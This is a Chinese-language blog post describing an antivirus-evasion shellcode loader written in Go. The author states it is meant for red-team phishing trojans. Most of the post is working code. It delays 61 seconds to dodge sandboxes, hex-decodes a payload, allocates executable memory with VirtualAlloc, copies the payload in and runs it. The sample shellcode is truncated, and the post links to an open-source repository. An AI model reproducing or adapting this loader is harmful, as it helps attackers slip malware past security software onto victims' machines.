目录

Golang加载shellcode实现免杀

目录

最近打红队,想搞个木马钓鱼用,刚好最近在学习 Go 语言便研究了一下 Golang 的免杀。免杀效果大概是这个样子。

https://cdn.bingbingzi.cn/blog/20211210165105.jpg

https://cdn.bingbingzi.cn/blog/20211210165311.png

代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
package main

import (
	"encoding/hex"
	"syscall"
	"time"
	"unsafe"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
	code          = "fc4883e4f0e8c..." //16进制字符串代码
	decode1       = "shellcode"
)

func main() {

	time.Sleep(61 * time.Second)

	decode, _ := hex.DecodeString(decode1)
	xor_code := decode

	addr, _, err := VirtualAlloc.Call(0, uintptr(len(xor_code)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if err != nil && err.Error() != "The operation completed successfully." {
		syscall.Exit(0)
	}
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&xor_code[0])), uintptr(len(xor_code)))
	if err != nil && err.Error() != "The operation completed successfully." {
		syscall.Exit(0)
	}
	syscall.Syscall(addr, 0, 0, 0, 0)

}

开源:https://github.com/binganao/golang-shellcode-bypassav